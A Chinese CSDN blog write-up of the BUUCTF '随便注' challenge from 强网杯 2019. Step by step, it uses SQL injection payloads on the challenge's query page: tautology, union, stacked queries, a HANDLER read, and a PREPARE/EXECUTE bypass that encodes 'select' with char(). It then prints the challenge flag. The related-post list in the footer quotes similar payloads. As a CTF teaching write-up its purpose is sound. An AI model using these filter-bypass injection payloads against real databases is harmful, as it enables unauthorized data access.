buuctf_随便注【手工注入】

最新推荐文章于 2023-10-13 22:59:10 发布
最新推荐文章于 2023-10-13 22:59:10 发布
阅读量265 收藏
点赞数
分类专栏: BUUCTF 文章标签: sql php web mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61968245/article/details/122022184
版权

0x01 题目链接

https://buuoj.cn/challengeshttps://buuoj.cn/challenges

0x02 题型

 查询页面

那么先尝试万能钥匙注入

构造payload

1' or 1=1#

发现存在注入点,尝试使用order by,判断的字段数

 发现当等于3时,报错,那么字段为2【:为什么查询末尾变成了--+而不是#,应为#在hackbar里用不了,--+可以,都是注释的意思】

接着使用常规的联合查询语句

构造payload

-1' union select 1,2--+

既然都对关键字过滤了,那么换一种思路,如果用堆叠注入呢

构造payload

 -1'; show databases; --+

成功爆出一堆数据库名,尝试爆出表名

构造payload

-1';show tables; --+

查询第一张表的字段:

构造payload 

-1';show columns from  `1919810931114514`; --+

 【:当表名为数字时,该表名要用魔术引号,即反引号包起来查询】

有flag字段,证明在这个表中

0x03 不同解法

第一种:

        因为select关键字被过滤了,那么可以尝试使用handler来进行替代

构造payload

-1';handler `1919810931114514` open as `a`;handler `a` read next;--+

第二种

        虽然过滤了关键字,但是mysql有个特性,它支持10进制编码的执行,那么可以尝试把查询语句select进行编码

知识点:

SET @tn = 'hahaha';  //存储表名
SET @sqli = concat('select * from ', @tn);  //存储SQL语句
PREPARE name from @sql;   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

构造payload

 -1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE st from @sqli;EXECUTE st;--+

 

flag{49e1b425-331c-44f6-b6cf-bfb92ff68d29}

SharpKean
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFweb之强网杯2019随便
12-14
开始注入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF随便
金 帛的博客
04-03 5340
BUUCTF的WP
BUUCTF-随便(easy_sql
weixin_51383898的博客
10-13 273
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF-web-随便
nareku的博客
07-06 1071
输入1试试,可以看到是GET传参 判断一下是数字型注入还是字符型注入 可以看出来是字符型注入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询注入貌似没有,试试堆叠查询注入输入: 1' ; show databases;#说明堆叠查询注入可行输入: -1' ;
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2175
buuctf的强网杯2019为例的堆叠注入
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
https://buuoj.cn/challenges#[SUCTF2018]followme
wangjin7356的博客
12-30 1288
https://buuoj.cn/challenges#[SUCTF2018]followme 题目是抓包文件,用wireshark打开 追踪流什么也没有发现,导出http对象 有很多login开头的文件,尝试查找CTF信息。用findstr命令: findstr "CTF" *.* 找到flag SUCTF{password_is_not_weak} 在kali,用grep也可以查找,followme为http导出对象的保存目录 grep -r 'CTF' followme flag{passwo
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 5433
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
BUUCTF之二维码
weixin_45728231的博客
10-27 1万+
文章目录二维码题目解题过程补充:windows系统下的解题流程 二维码 题目 附件链接 解题过程 下载附件发现是一个压缩包。 解压,发现里面存在一张二维码。 毫不犹豫打开二维码扫描工具QR research进行扫描 天真认为这就是flag点击提交(不放过任何一次机会),结果当然没过啦! 没死心以为是空格的原因,删去空格再次提交,当然还是没过啦! 于是菜鸡开始看教程,向菜狗求救!!! 由于附件中只有一张二维码,而且刚才的提示信息secret is here 表明flag确实在这里,于是想到
BUUCTF——随便
weixin_45864041的博客
09-21 733
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql注入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql注入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行注入,所以我们换一个思路,看一看是否可以进行堆叠注入 通过上面的测试可以看到,可以进行堆叠注入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
CTF题之BUUCTF系列:BUUCTF Misc 你竟然赶我走
一只小蜜蜂的博客
07-31 3169
一、名称 BUUCTF Misc 你竟然赶我走 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个jpg文件 打开图片如下: 三、解题步骤1、方法一: 使用winhex工具打开biubiu.jpg文件,查看一下内部结构 文档最后面显示出了flag值为 flag{stego_is_s0_bor1ing} 2、方法二: 使用StegSolve工具打开,Analyse--File Format--获得右图结果 文档左下角显示出flag值为...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3815
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
BUUCTF-随便、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 751
目录[强网杯 2019]随便[ACTF2020 新生赛]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql注入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断注入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
sql手工注入练习拿flag
太阳照耀我走四方
02-14 1997
sql手工简单注入拿flag
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019年强网杯举办的CTF比赛中的一道...总之,buuctf-强网杯2019随便是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值